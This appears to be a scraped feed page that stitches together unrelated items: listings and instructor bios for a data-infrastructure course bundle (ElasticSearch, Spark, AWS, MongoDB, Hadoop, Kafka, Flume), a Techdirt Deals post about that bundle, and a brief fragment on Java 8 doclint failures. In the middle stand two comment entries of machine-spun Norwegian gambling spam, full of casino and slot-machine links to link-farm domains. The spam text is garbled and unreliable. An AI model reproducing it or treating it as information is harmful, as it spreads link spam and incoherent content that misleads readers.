KEY FEATURES

Learn how to use ElasticSearch in combination with the rest of the Elastic Stack to ship, parse, store, and analyze logs! You'll start by getting an understanding of what ElasticSearch is, what it's used for, and why it's important before being introduced to the new features of Elastic Search 5.0.

  • Access 35 lectures & 3 hours of content 24/7
  • Go through each of the fundamental concepts of ElasticSearch such as queries, indices, & aggregation
  • Add more power to your searches using filters, ranges, & more
  • See how ElasticSearch can be used w/ other components like LogStash, Kibana, & Beats
  • Build, test, & run your first LogStash pipeline to analyze Apache web logs

PRODUCT SPECS

Details & Requirements

  • Length of time users can access this course: lifetime
  • Access options: web streaming, mobile streaming
  • Certification of completion not included
  • Redemption deadline: redeem your code within 30 days of purchase
  • Experience level required: all levels

Compatibility

  • Internet required

THE EXPERT

Ethan Anthony is a San Francisco based Data Scientist who specializes in distributed data centric technologies. He is also the Founder of XResults, where the vision is to harness the power of data to innovate and deliver intuitive customer facing solutions, largely to non-technical professionals. Ethan has over 10 combined years of experience in cloud based technologies such as Amazon webservices and OpenStack, as well as the data centric technologies of Hadoop, Mahout, Spark and ElasticSearch. He began using ElasticSearch in 2011 and has since delivered solutions based on the Elastic Stack to a broad range of clientele. Ethan has also consulted worldwide, speaks fluent Mandarin Chinese and is insanely curious about human cognition, as related to cognitive dissonance.

Apache Spark 2 for Beginners


KEY FEATURES

Apache Spark is one of the most widely-used large-scale data processing engines and runs at extremely high speeds. It's a framework that has tools that are equally useful for app developers and data scientists. This book starts with the fundamentals of Spark 2 and covers the core data processing framework and API, installation, and application development setup.

  • Access 45 lectures & 5.5 hours of content 24/7
  • Learn the Spark programming model through real-world examples
  • Explore Spark SQL programming w/ DataFrames
  • Cover the charting & plotting features of Python in conjunction w/ Spark data processing
  • Discuss Spark's stream processing, machine learning, & graph processing libraries
  • Develop a real-world Spark application

PRODUCT SPECS

Details & Requirements

  • Length of time users can access this course: lifetime
  • Access options: web streaming, mobile streaming
  • Certification of completion not included
  • Redemption deadline: redeem your code within 30 days of purchase
  • Experience level required: all levels

Compatibility

  • Internet required

THE EXPERT

Rajanarayanan Thottuvaikkatumana, Raj, is a seasoned technologist with more than 23 years of software development experience at various multinational companies. He has lived and worked in India, Singapore, and the USA, and is presently based out of the UK. His experience includes architecting, designing, and developing software applications. He has worked on various technologies including major databases, application development platforms, web technologies, and big data technologies. Since 2000, he has been working mainly in Java related technologies, and does heavy-duty server-side programming in Java and Scala. He has worked on very highly concurrent, highly distributed, and high transaction volume systems. Currently he is building a next generation Hadoop YARN-based data processing platform and an application suite built with Spark using Scala.

Raj holds one master's degree in Mathematics, one master's degree in Computer Information Systems and has many certifications in ITIL and cloud computing to his credit. Raj is the author of Cassandra Design Patterns - Second Edition, published by Packt.

When not working on the assignments his day job demands, Raj is an avid listener to classical music and watches a lot of tennis.

Designing AWS Environments


KEY FEATURES

Amazon Web Services (AWS) provides trusted, cloud-based solutions to help businesses meet all of their needs. Running solutions in the AWS Cloud can help you (or your company) get applications up and running faster while providing the security needed to meet your compliance requirements. This course leaves no stone unturned in getting you up to speed with administering AWS.

  • Access 19 lectures & 2 hours of content 24/7
  • Familiarize yourself w/ the key capabilities to architect & host apps, websites, & services on AWS
  • Explore the available options for virtual instances & demonstrate launching & connecting to them
  • Design & deploy networking & hosting solutions for large deployments
  • Focus on security & important elements of scalability & high availability

PRODUCT SPECS

Details & Requirements

  • Length of time users can access this course: lifetime
  • Access options: web streaming, mobile streaming
  • Certification of completion not included
  • Redemption deadline: redeem your code within 30 days of purchase
  • Experience level required: all levels

Compatibility

  • Internet required

THE EXPERT

Wayde Gilchrist started moving customers of his IT consulting business into the cloud and away from traditional hosting environments in 2010. In addition to consulting, he delivers AWS training for Fortune 500 companies, government agencies, and international consulting firms. When he is not out visiting customers, he is delivering training virtually from his home in Florida.

Learning MongoDB


KEY FEATURES

Businesses today have access to more data than ever before, and a key challenge is ensuring that data can be easily accessed and used efficiently. MongoDB makes it possible to store and process large sets of data in a ways that drive up business value. Learning MongoDB will give you the flexibility of unstructured storage, combined with robust querying and post processing functionality, making you an asset to enterprise Big Data needs.

  • Access 64 lectures & 40 hours of content 24/7
  • Master data management, queries, post processing, & essential enterprise redundancy requirements
  • Explore advanced data analysis using both MapReduce & the MongoDB aggregation framework
  • Delve into SSL security & programmatic access using various languages
  • Learn about MongoDB's built-in redundancy & scale features, replica sets, & sharding

PRODUCT SPECS

Details & Requirements

  • Length of time users can access this course: lifetime
  • Access options: web streaming, mobile streaming
  • Certification of completion not included
  • Redemption deadline: redeem your code within 30 days of purchase
  • Experience level required: all levels

Compatibility

  • Internet required

THE EXPERT

Daniel Watrous is a 15-year veteran of designing web-enabled software. His focus on data store technologies spans relational databases, caching systems, and contemporary NoSQL stores. For the last six years, he has designed and deployed enterprise-scale MongoDB solutions in semiconductor manufacturing and information technology companies. He holds a degree in electrical engineering from the University of Utah, focusing on semiconductor physics and optoelectronics. He also completed an MBA from the Northwest Nazarene University. In his current position as senior cloud architect with Hewlett Packard, he focuses on highly scalable cloud-native software systems.

Learning Hadoop 2


KEY FEATURES

Hadoop emerged in response to the proliferation of masses and masses of data collected by organizations, offering a strong solution to store, process, and analyze what has commonly become known as Big Data. It comprises a comprehensive stack of components designed to enable these tasks on a distributed scale, across multiple servers and thousand of machines. In this course, you'll learn Hadoop 2, introducing yourself to the powerful system synonymous with Big Data.

  • Access 19 lectures & 1.5 hours of content 24/7
  • Get an overview of the Hadoop component ecosystem, including HDFS, Sqoop, Flume, YARN, MapReduce, Pig, & Hive
  • Install & configure a Hadoop environment
  • Explore Hue, the graphical user interface of Hadoop
  • Discover HDFS to import & export data, both manually & automatically
  • Run computations using MapReduce & get to grips working w/ Hadoop's scripting language, Pig
  • Siphon data from HDFS into Hive & demonstrate how it can be used to structure & query data sets

PRODUCT SPECS

Details & Requirements

  • Length of time users can access this course: lifetime
  • Access options: web streaming, mobile streaming
  • Certification of completion not included
  • Redemption deadline: redeem your code within 30 days of purchase
  • Experience level required: all levels

Compatibility

  • Internet required

THE EXPERT

Randal Scott King is the Managing Partner of Brilliant Data, a consulting firm specialized in data analytics. In his 16 years of consulting, Scott has amassed an impressive list of clientele from mid-market leaders to Fortune 500 household names. Scott lives just outside Atlanta, GA, with his children.

ElasticSearch 5.x Cookbook eBook


KEY FEATURES

ElasticSearch is a Lucene-based distributed search server that allows users to index and search unstructured content with petabytes of data. Through this ebook, you'll be guided through comprehensive recipes covering what's new in ElasticSearch 5.x as you create complex queries and analytics. By the end, you'll have an in-depth knowledge of how to implement the ElasticSearch architecture and be able to manage data efficiently and effectively.

  • Access 696 pages of content 24/7
  • Perform index mapping, aggregation, & scripting
  • Explore the modules of Cluster & Node monitoring
  • Understand how to install Kibana to monitor a cluster & extend Kibana for plugins
  • Integrate your Java, Scala, Python, & Big Data apps w/ ElasticSearch

PRODUCT SPECS

Details & Requirements

  • Length of time users can access this course: lifetime
  • Access options: web streaming, mobile streaming
  • Certification of completion not included
  • Redemption deadline: redeem your code within 30 days of purchase
  • Experience level required: all levels

Compatibility

  • Internet required

THE EXPERT

Alberto Paro is an engineer, project manager, and software developer. He currently works as freelance trainer/consultant on big data technologies and NoSQL solutions. He loves to study emerging solutions and applications mainly related to big data processing, NoSQL, natural language processing, and neural networks. He began programming in BASIC on a Sinclair Spectrum when he was eight years old, and to date, has collected a lot of experience using different operating systems, applications, and programming languages.

In 2000, he graduated in computer science engineering from Politecnico di Milano with a thesis on designing multiuser and multidevice web applications. He assisted professors at the university for about a year. He then came in contact with The Net Planet Company and loved their innovative ideas; he started working on knowledge management solutions and advanced data mining products. In summer 2014, his company was acquired by a big data technologies company, where he worked until the end of 2015 mainly using Scala and Python on state-of-the-art big data software (Spark, Akka, Cassandra, and YARN). In 2013, he started freelancing as a consultant for big data, machine learning, Elasticsearch and other NoSQL products. He has created or helped to develop big data solutions for business intelligence, financial, and banking companies all over the world. A lot of his time is spent teaching how to efficiently use big data solutions (mainly Apache Spark), NoSql datastores (Elasticsearch, HBase, and Accumulo) and related technologies (Scala, Akka, and Playframework). He is often called to present at big data or Scala events. He is an evangelist on Scala and Scala.js (the transcompiler from Scala to JavaScript).

In his spare time, when he is not playing with his children, he likes to work on open source projects. When he was in high school, he started contributing to projects related to the GNOME environment (gtkmm). One of his preferred programming languages is Python, and he wrote one of the first NoSQL backends on Django for MongoDB (Django-MongoDBengine). In 2010, he began using Elasticsearch to provide search capabilities to some Django e-commerce sites and developed PyES (a Pythonic client for Elasticsearch), as well as the initial part of the Elasticsearch MongoDB river. He is the author of Elasticsearch Cookbook as well as a technical reviewer of Elasticsearch Server-Second Edition, Learning Scala Web Development, and the video course, Building a Search Server with Elasticsearch, all of which are published by Packt Publishing.

Fast Data Processing with Spark 2 eBook


KEY FEATURES

Compared to Hadoop, Spark is a significantly more simple way to process Big Data at speed. It is increasing in popularity with data analysts and engineers everywhere, and in this course you'll learn how to use Spark with minimum fuss. Starting with the fundamentals, this ebook will help you take your Big Data analytical skills to the next level.

  • Access 274 pages of content 24/7
  • Get to grips w/ some simple APIs before investigating machine learning & graph processing
  • Learn how to use the Spark shell
  • Load data & build & run your own Spark applications
  • Discover how to manipulate RDD
  • Understand useful machine learning algorithms w/ the help of Spark MLlib & R

PRODUCT SPECS

Details & Requirements

  • Length of time users can access this course: lifetime
  • Access options: web streaming, mobile streaming
  • Certification of completion not included
  • Redemption deadline: redeem your code within 30 days of purchase
  • Experience level required: all levels

Compatibility

  • Internet required

THE EXPERT

Krishna Sankar is a Senior Specialist—AI Data Scientist with Volvo Cars focusing on Autonomous Vehicles. His earlier stints include Chief Data Scientist at http://cadenttech.tv/, Principal Architect/Data Scientist at Tata America Intl. Corp., Director of Data Science at a bioinformatics startup, and as a Distinguished Engineer at Cisco. He has been speaking at various conferences including ML tutorials at Strata SJC and London 2016, Spark Summit, Strata-Spark Camp, OSCON, PyCon, and PyData, writes about Robots Rules of Order, Big Data Analytics—Best of the Worst, predicting NFL, Spark, Data Science, Machine Learning, Social Media Analysis as well as has been a guest lecturer at the Naval Postgraduate School. His occasional blogs can be found at https://doubleclix.wordpress.com/. His other passion is flying drones (working towards Drone Pilot License (FAA UAS Pilot) and Lego Robotics—you will find him at the St.Louis FLL World Competition as Robots Design Judge.

MongoDB Cookbook: Second Edition eBook


KEY FEATURES

MongoDB is a high-performance, feature-rich, NoSQL database that forms the backbone of the systems that power many organizations. Packed with easy-to-use features that have become essential for a variety of software professionals, MongoDB is a vital technology to learn for any aspiring data scientist or systems engineer. This cookbook contains many solutions to the everyday challenges of MongoDB, as well as guidance on effective techniques to extend your skills and capabilities.

  • Access 274 pages of content 24/7
  • Initialize the server in three different modes w/ various configurations
  • Get introduced to programming language drivers in Java & Python
  • Learn advanced query operations, monitoring, & backup using MMS
  • Find recipes on cloud deployment, including how to work w/ Docker containers along MongoDB

PRODUCT SPECS

Details & Requirements

  • Length of time users can access this course: lifetime
  • Access options: web streaming, mobile streaming
  • Certification of completion not included
  • Redemption deadline: redeem your code within 30 days of purchase
  • Experience level required: all levels

Compatibility

  • Internet required

THE EXPERT

Amol Nayak is a MongoDB certified developer and has been working as a developer for over 8 years. He is currently employed with a leading financial data provider, working on cutting-edge technologies. He has used MongoDB as a database for various systems at his current and previous workplaces to support enormous data volumes. He is an open source enthusiast and supports it by contributing to open source frameworks and promoting them. He has made contributions to the Spring Integration project, and his contributions are the adapters for JPA, XQuery, MongoDB, Push notifications to mobile devices, and Amazon Web Services (AWS). He has also made some contributions to the Spring Data MongoDB project. Apart from technology, he is passionate about motor sports and is a race official at Buddh International Circuit, India, for various motor sports events. Earlier, he was the author of Instant MongoDB, Packt Publishing.

Cyrus Dasadia always liked tinkering with open source projects since 1996. He has been working as a Linux system administrator and part-time programmer for over a decade. He works at InMobi, where he loves designing tools and platforms. His love for MongoDB started in 2013, when he was amazed by its ease of use and stability. Since then, almost all of his projects are written with MongoDB as the primary backend. Cyrus is also the creator of an open source alert management system called CitoEngine. He likes spending his spare time trying to reverse engineer software, playing computer games, or increasing his silliness quotient by watching reruns of Monty Python.

Learning Apache Kafka: Second Edition eBook


KEY FEATURES

Apache Kafka is simple describe at a high level bust has an immense amount of technical detail when you dig deeper. This step-by-step, practical guide will help you take advantage of the power of Kafka to handle hundreds of megabytes of messages per second from multiple clients.

  • Access 120 pages of content 24/7
  • Set up Kafka clusters
  • Understand basic blocks like producer, broker, & consumer blocks
  • Explore additional settings & configuration changes to achieve more complex goals
  • Learn how Kafka is designed internally & what configurations make it most effective
  • Discover how Kafka works w/ other tools like Hadoop, Storm, & more

PRODUCT SPECS

Details & Requirements

  • Length of time users can access this course: lifetime
  • Access options: web streaming, mobile streaming
  • Certification of completion not included
  • Redemption deadline: redeem your code within 30 days of purchase
  • Experience level required: all levels

Compatibility

  • Internet required

THE EXPERT

Nishant Garg has over 14 years of software architecture and development experience in various technologies, such as Java Enterprise Edition, SOA, Spring, Hadoop, Hive, Flume, Sqoop, Oozie, Spark, Shark, YARN, Impala, Kafka, Storm, Solr/Lucene, NoSQL databases (such as HBase, Cassandra, and MongoDB), and MPP databases (such as GreenPlum).

He received his MS in software systems from the Birla Institute of Technology and Science, Pilani, India, and is currently working as a technical architect for the Big Data R&D Group with Impetus Infotech Pvt. Ltd. Previously, Nishant has enjoyed working with some of the most recognizable names in IT services and financial industries, employing full software life cycle methodologies such as Agile and SCRUM.

Nishant has also undertaken many speaking engagements on big data technologies and is also the author of HBase Essestials, Packt Publishing.

Apache Flume: Distributed Log Collection for Hadoop: Second Edition eBook


KEY FEATURES

Apache Flume is a distributed, reliable, and available service used to efficiently collect, aggregate, and move large amounts of log data. It's used to stream logs from application servers to HDFS for ad hoc analysis. This ebook start with an architectural overview of Flume and its logical components, and pulls everything together into a real-world, end-to-end use case encompassing simple and advanced features.

  • Access 178 pages of content 24/7
  • Explore channels, sinks, & sink processors
  • Learn about sources & channels
  • Construct a series of Flume agents to dynamically transport your stream data & logs from your systems into Hadoop

PRODUCT SPECS

Details & Requirements

  • Length of time users can access this course: lifetime
  • Access options: web streaming, mobile streaming
  • Certification of completion not included
  • Redemption deadline: redeem your code within 30 days of purchase
  • Experience level required: all levels

Compatibility

  • Internet required

THE EXPERT

Steve Hoffman has 32 years of experience in software development, ranging from embedded software development to the design and implementation of large-scale, service-oriented, object-oriented systems. For the last 5 years, he has focused on infrastructure as code, including automated Hadoop and HBase implementations and data ingestion using Apache Flume. Steve holds a BS in computer engineering from the University of Illinois at Urbana-Champaign and an MS in computer science from DePaul University. He is currently a senior principal engineer at Orbitz Worldwide (http://orbitz.com/).

          Комментарий к записи Сценарий праздника «Лесная фея» (RichieCek)   
Casino Bellini har kortspill og casinospill Spill og vinn pa Casino Bellini og her kan du lese mer om det Spill og vinn pa Casino Bellini Norske pokersider. <a href="http://atcbot.net/casino-all-slots-free/2037" rel="nofollow">casino all slots free</a> <a href="http://abfarah.com/maria-bingo-app/3670" rel="nofollow">maria bingo app</a> For a tiltrekke nye kunder i et konkurransepreget marked har derfor mange bingosider begynt a tilby gratis bonuser eller bingo til nye kunder slik at de kan prove. <a href="http://castinq.com/spilleautomat-sushi-express/3105" rel="nofollow">spilleautomat Sushi Express</a> Online casino er en avledning av den landbaserte tradisjonelle casino, ogsa kjent som virtuelle kasinoer eller gambling nettsteder og gir diverse spill eller en. Det er ingen penger som kreves Alle som er gratis a delta og a spille for ubegrenset tid i dag Gratis casino slots representerer den ultimate gambling ressurs i. <a href="http://driveacedoran.com/slot-apache-2/1078" rel="nofollow">slot apache 2</a> <a href="http://aishouzuo.org/spilleautomater-desert-dreams/1548" rel="nofollow">spilleautomater Desert Dreams</a> <a href="http://campuslostnfound.com/casino-mobile/1236" rel="nofollow">casino mobile</a> <a href="http://casahistorias.com/bonus-norsk-tipping/1969" rel="nofollow">bonus norsk tipping</a> <a href="http://alibaparts.com/casino-drammen/3465" rel="nofollow">casino drammen</a> Overkill Software skriver i innbydelsen at Golden Grin Casino has more to Da er det kanskje best at utviklerne av blant annet sistnevnte og Dear Esther tar pa seg I forbindelse med oppdateringen Ill-Gotten Gains til onlinedelen i Grand. <a href="http://blvbrasil.com/norgesautomaten-bonus/2272" rel="nofollow">norgesautomaten bonus</a> <a href="http://creativeommons.org/spill-p-nettet/1522" rel="nofollow">spill p? nettet</a> Dersom du har spesielle onsker angaende et produkt, ta kontakt via email sa kan vi Du trenger ikke a opprette eller ha noen konto hos PayPal for a betale med ditt For kunder bosatt utenfor Norge inkl Svalbard gjelder egne betingelser. <a href="http://guess-emoji-help.com/spille-ludo-p-nett/2669" rel="nofollow">spille ludo p? nett</a> <a href="http://bitwidth.com/spilleautomater-danskebten/1020" rel="nofollow">spilleautomater danskeb?ten</a> Fa 1/3 av oddsen pa alle plasseringer pa alle Vinn/Plass Forste malscorer veddemal paill. <a href="http://pagaresdeempresa.com/casino-kortspil-point/2373" rel="nofollow">casino kortspil point</a> <a href="http://animalimaging.org/live-casino-dealer/2522" rel="nofollow">live casino dealer</a> Hos FOREX Bank kan du bade veksle og kjope utenlandske valuta til gunstige kurser og avgifter Ikke reis uten kontanter - kjop valuta gebyrfritt. <a href="http://adventistasin.org/choy-sun-doa-slot/1287" rel="nofollow">choy sun doa slot</a> Kan du sjekke ut noen Internet Casino nettsteder i web for a skaffe mye mer forstaelse avhengig av entusiasme disse spilltitler gi casino bonuser 2 Mange. Den gratis mater a se live Basketball Spill OnlineWatching levende Toms sko spill pa nettet har aldri vrt mer tilgjengelig Vi likte Syvende generasjon for vi fant. <a href="http://bejeans.com/lucky-nugget-casino-live-chat/4030" rel="nofollow">lucky nugget casino live chat</a> <a href="http://aishouzuo.org/premier-online-roulette/924" rel="nofollow">premier online roulette</a> <a href="http://bejeans.com/spilleautomater-elektra/3050" rel="nofollow">spilleautomater Elektra</a> <a href="http://cathymumford.com/free-spins-casino-no-deposit-bonus/3937" rel="nofollow">free spins casino no deposit bonus</a> <a href="http://abfarah.com/creature-from-the-black-lagoon-slot-machine/17" rel="nofollow">creature from the black lagoon slot machine</a> Dragonara casino anmeldelse Fa 100% bonus til €200,- Dragonara casino er nettutgaven av et av Maltas og Middelhavets aller storste landbaserte casino. <a href="http://cpasecretsrevealed.com/gratis-bingo-p-nett/1963" rel="nofollow">gratis bingo p? nett</a> <a href="http://abititmuss.org/slot-excalibur-bonus/4851" rel="nofollow">slot excalibur bonus</a> Velkommen til Norske Spill AS Her finner du kontaktinfo, apningstider, avdelingsoversikt, og kart med mer. <a href="http://atcbot.net/slot-gonzos-quest/974" rel="nofollow">slot gonzos quest</a> <a href="http://abfarah.com/spill-live-casino/396" rel="nofollow">spill live casino</a> Bonytt-hjelpen Bonytt-hjelpen er et konsept hvor du som leser kan soke og vinneteriorhjelp til en verdi av 15sperten kommer hjem til. <a href="http://caribbeannecklacecompany.com/mr-green-casino/4680" rel="nofollow">mr green casino</a> <a href="http://buitensport.info/casino-sogndal/3195" rel="nofollow">casino Sogndal</a> Kypros, okonomisk nedsmelting, EU, europeiske okonomiske fellesskap, gigantiske Guests kan nyte Hollywood Park Casino, eller de vakre Los Angeles. <a href="http://carlosanoguera.com/spil-apache-spilleautomat/945" rel="nofollow">spil apache spilleautomat</a> Finest alle casinoer pa nett Canada cankayaimarcomtr give exclusive bonuses norske casinoer pa nett - top rated online casinos. Rekreasjon for optimal Online Casino Videospill? <a href="http://comunidadcf.com/baccarat-program/2744" rel="nofollow">baccarat program</a> <a href="http://adventistasin.org/norske-spill-casino-review/273" rel="nofollow">norske spill casino review</a> <a href="http://bejeans.com/bonbon-godteri-p-nett/4424" rel="nofollow">bonbon godteri p? nett</a> <a href="http://glorent.org/maria-bingo-bonus/1230" rel="nofollow">maria bingo bonus</a> <a href="http://buitensport.info/neon-staxx-spilleautomat/2191" rel="nofollow">Neon Staxx Spilleautomat</a> Oppdatering av kampstilling og premieprognose fra internett mens kampene Systemtipping er gratis Neste ukers kampoppsett hentes ned fra internett. <a href="http://chilture.org/casino-sandefjord/2752" rel="nofollow">casino Sandefjord</a> <a href="http://guess-emoji-help.com/las-vegas-casino-tips/3278" rel="nofollow">las vegas casino tips</a> Dei er leverandor til dei storste Spa & Thalasso sentera i inn og utland I Noreg finn me bla hotell som Holmenkollen Spa, Alexsandra Loen og Selje Thalasso. <a href="http://bloodhoundbets.com/slot-online-casino/999" rel="nofollow">slot online casino</a> <a href="http://abititmuss.org/vinn-penger-p-nettspill/4789" rel="nofollow">vinn penger p? nettspill</a> Fa mer underholdning med rulett pa nett hos EUcasinocom Vr pa utkikk etter innsatstallene for Superrulett Et nytt tall gis ut hver dag, og du har muligheten. <a href="http://atcbot.net/eurogrand-casino-erfahrungen/3022" rel="nofollow">eurogrand casino erfahrungen</a> <a href="http://bongordshn.com/poker-triks/2696" rel="nofollow">poker triks</a> Bo godt i Stromstad pa Quality Spa & Resort Fa gode priser pa batreise + hotell i Sverige Bestill reisen enkelt pa colorlineno. <a href="http://chucksalmon.com/live-casino-andy-twitter/3924" rel="nofollow">live casino andy twitter</a> En av mange nokkel attraksjoner med a spille online casino spill pa Slots Denne gangen vil du fa en 100% casino bonus opp til 1000kr nar du gjor din forste. Cheap Toms outlet 141,Nike Free Run +2 menn sko Bla Hvit,The Light, komfortable og slitesterke Of Billige Toms Sko pa nett Salg fra Norge Toms: En for One. <a href="http://binobat.com/spilleautomat-iphone/94" rel="nofollow">spilleautomat iphone</a> <a href="http://abfarah.com/casino-odds/3829" rel="nofollow">casino odds</a> <a href="http://codiamo.com/spill-p-mobil/3312" rel="nofollow">spill p? mobil</a>
          Комментарий к записи Сценарий праздника «Лесная фея» (RichieCek)   
Marit Hars eksemplar av Barndom - 80-tallet av Kristin von Hirsch - Se Hva med eimen av nykreppet har? <a href="http://norgeslotsplanet.info/888-casino-legit/3412" rel="nofollow">888 casino legit</a> <a href="http://norgeslotsbase.info/beste-innskuddsbonus-odds/3082" rel="nofollow">beste innskuddsbonus odds</a> Har ikke musematte 4 FAVORITT SELSKAPSSPILL? <a href="http://greenslotsplanet.info/norge-spilleliste/2477" rel="nofollow">norge spilleliste</a> P ingen satt inn internet casino video game generelt det er penbart ikke Som et resultat Casino Tropez fordeler finne aller nyeste helt gratis gambling. Spin Palace er et online kasino lisensiert av Kahnawake Gaming Commission, Mohawk Territory Manedlig utbetaling rapporter utgitt av Spin Palace Casino. <a href="http://norskslotsspot.info/spilleautomater-iron-man-2/3947" rel="nofollow">spilleautomater Iron Man 2</a> <a href="http://norskslotscenter.info/netent-casinos-no-deposit-free-spins/3979" rel="nofollow">netent casinos no deposit free spins</a> <a href="http://norskslotsspot.info/spille-gratis-online-spill/275" rel="nofollow">spille gratis online spill</a> <a href="http://greenslotslife.info/crazy-reels-spilleautomat/3173" rel="nofollow">crazy reels spilleautomat</a> <a href="http://norskslotsweb.info/texas-holdem-tips-and-tricks/1718" rel="nofollow">texas holdem tips and tricks</a> Oversettelsen av ordet bingo mellom norsk, engelsk, spansk og svensk. <a href="http://norgeslotshub.info/wheres-the-gold-spilleautomat/2147" rel="nofollow">Wheres The Gold Spilleautomat</a> <a href="http://greenslotsplanet.info/spilleautomat-arabian-nights/909" rel="nofollow">spilleautomat Arabian Nights</a> Sa hvis deg kjrlighet til send det er vurdert en network marketing business for du til fa tak i betalt legger det tjen penger pa nett Vil Du sannsynligvis vre godt. <a href="http://greenslotslife.info/progressive-slots-online-free/4770" rel="nofollow">progressive slots online free</a> <a href="http://norskslotshub.info/no-download-casino-slots-free-bonus/2119" rel="nofollow">no download casino slots free bonus</a> Spillno er Norges storste community og redaksjonelle nettsted for spill til PC, Playstation 3, Xbox 360, Nintendo Wii Na kan du ogsa bygge din egen landsby. <a href="http://norskslotsspot.info/gratis-spins-2015/4883" rel="nofollow">gratis spins 2015</a> <a href="http://greenslotscenter.info/slot-excalibur-trucchi/4849" rel="nofollow">slot excalibur trucchi</a> Det er en utfordring at ferdselen i nasjonalparken i stor grad handler om turen til Forollhogna-toppen Nasjonalparken lanserer villrein-vennlig app. <a href="http://norskslotslife.info/free-spinns-casino/787" rel="nofollow">free spinns casino</a> Na kan du spille 900 arkade-spill gratis pa nettet14 Norsk Casino pa Nett - Kasino info online Alt om norsk casino pa nett - de nyeste kasino spill. Mobil casino er siste nytt i spillverden, men hva er egentlig mobil casino? <a href="http://norskslotsclub.info/werewolf-wild-slot-machine-online/1485" rel="nofollow">werewolf wild slot machine online</a> <a href="http://norgeslotscenter.info/spilleautomater-tomb-raider/4693" rel="nofollow">spilleautomater Tomb Raider</a> <a href="http://norskslotsplanet.info/odds-fotball-em-2015/1865" rel="nofollow">odds fotball em 2015</a> <a href="http://greenslotsworld.info/hammerfest-nettcasino/3886" rel="nofollow">Hammerfest nettcasino</a> <a href="http://greenslotsweb.info/slot-games-download-free-pc/55" rel="nofollow">slot games download free pc</a> Top Sites I CasinoEuro sin online casino lobby finner du et stort utvalg av spennende og underholdende casinospill som spilleautomater, live casino og Video. <a href="http://greenslotsweb.info/slot-book-of-raa/2521" rel="nofollow">slot book of raa</a> <a href="http://norskslotslife.info/spilleautomater-danske/4271" rel="nofollow">spilleautomater danske</a> Topp Casino Utbetalinger Grunnleggende Casino Strategier Beste casino bonuser Flere Kampanjer Blackjack Ballroom Casino Golden Tiger Casino. <a href="http://norskslotsworld.info/spilleautomat-immortal-romance/1539" rel="nofollow">spilleautomat Immortal Romance</a> <a href="http://norgeslotsplanet.info/kronespill-app-store/1541" rel="nofollow">kronespill app store</a> Her vil dei framfore det dei skal spele pa konsert i Liverpool i slutten av mars Det vert eit al orkesteret Ytre Strok reise til Liverpool Mor til ein av. <a href="http://norskslotsworld.info/maria-bingo-bonuskode/3401" rel="nofollow">maria bingo bonuskode</a> <a href="http://norskslotslife.info/spillavhengighet-norge/3783" rel="nofollow">spillavhengighet norge</a> Gratisspinn pa casino er populrt og her viser vi deg de mest populre gratisspinnene du kan fa akkurat na Noen er for nye spillere og noen gjelder bade nye. <a href="http://greenslotscenter.info/bedste-online-casinoer/4468" rel="nofollow">bedste online casinoer</a> Grasrotandel - NORSK TIPPING Hei alle sammen : Tipper du og har lyst a bidra med noe som er gratis? Det holder a reise til Kobenhavn. <a href="http://greenslotscenter.info/spilleautomater-fagernes/2370" rel="nofollow">spilleautomater Fagernes</a> <a href="http://norgeslotsspot.info/spilleautomat-native-treasure/1649" rel="nofollow">spilleautomat Native Treasure</a> <a href="http://norgeslotsplanet.info/dragon-drop-slot/1641" rel="nofollow">dragon drop slot</a> <a href="http://norskslotsweb.info/karamba-casino-free-spins/96" rel="nofollow">karamba casino free spins</a> <a href="http://greenslotsworld.info/bedste-casino-p-nettet/3448" rel="nofollow">bedste casino p? nettet</a> Opel ascona black jack Bilen var en d Orginal svart ikke black jack med orginalt soltak, er orginale GM ATS felger var stpt inn GM og opel logo inni ved. <a href="http://norskslotsclub.info/slot-scarface/4308" rel="nofollow">slot scarface</a> <a href="http://norgeslotsweb.info/spilleautomater-pa-dfds/4455" rel="nofollow">spilleautomater pa dfds</a> Thrills Casino tilbyr ett av markedets storste tilbud av casinospill pa mobilen Totalt finnes det overselvfolgelig far du en stor bonuspakke. <a href="http://norskslotscentral.info/spilleautomat-thief/2262" rel="nofollow">spilleautomat Thief</a> <a href="http://norskslotshub.info/euro-palace-online-casino/2831" rel="nofollow">euro palace online casino</a> Se Nettavisens fotballmagasin her gigantfisk i dypet Nettavisen ba om lesernes mening - skapte massivt kok pa nettet Om tre ar kan denne vre gratis. <a href="http://norgeslotscentral.info/play-slots-for-real-money/4851" rel="nofollow">play slots for real money</a> <a href="http://norgeslotslife.info/casino-nette-gmbh-dortmund/657" rel="nofollow">casino nette gmbh dortmund</a> Fa freespins sammen med Jack hos NorskeAutomater NorskeAutomater er et online casino som har blitt etablert for a tilby casinospill spesielt for spillere fra. <a href="http://norskslotsspot.info/casino-p-nettbrett/4308" rel="nofollow">casino p? nettbrett</a> Toms Kvinner Stitchouts Sko Linen 2013 Cheap Online Toms Kvinner Hekle Sko Navy Norge billig salg Toms kiler Toms skono Toms warehouse Sale haul. ALTRO a Oslo, Latin Room's Casino Club Intensivt nybegynnerkurs i Cubansk salsa lordag 28mars Lyst til a lre deg cubansk salsa? <a href="http://greenslotsweb.info/danske-spilleautomater-apache/1024" rel="nofollow">danske spilleautomater apache</a> <a href="http://norskslotslife.info/spilleautomater-brevik/813" rel="nofollow">spilleautomater Brevik</a> <a href="http://norskslotslife.info/spille-spill-no-barn/3377" rel="nofollow">spille spill no barn</a>
          Daily Deal: The Ultimate Data Infrastructure Architect Bundle   

Businesses have access to mountains of data. Big data and how to properly manage it is a big deal. The $36 Ultimate Data Infrastructure Architect Bundle is designed to teach you how to manage it all to make it more useful. The bundle includes 5 courses covering ElasticSearch 5.0, Apache Spark 2, MongoDB, Hadoop 2, and Amazon Web Services (AWS). You also receive 5 e-books offering expanded training on the concepts introduced in the courses. You’ll get an ElasticSearch 5.x Cookbook, Fast Data Processing with Spark 2, a MongoDB Cookbook, Learning Apache Kafka and Apache Flume: Distributed Log Collection for Hadoop.

Note: The Techdirt Deals Store is powered and curated by StackCommerce. A portion of all sales from Techdirt Deals helps support Techdirt. The products featured do not reflect endorsements by our editorial team.



Permalink | Comments | Email This Story

          Java 8 might kill doclint   
Since Java 8, javadoc doclint became a lot stricter. Up to now, we had some warnings here and there. But since we moved to Java 8, our Jenkins releases are failing because doclint would throw HTML parsing errors and stop the build. So I spent some time to correct those errors. I was thinking that it might not be such a bad idea to have correct javadoc after all.

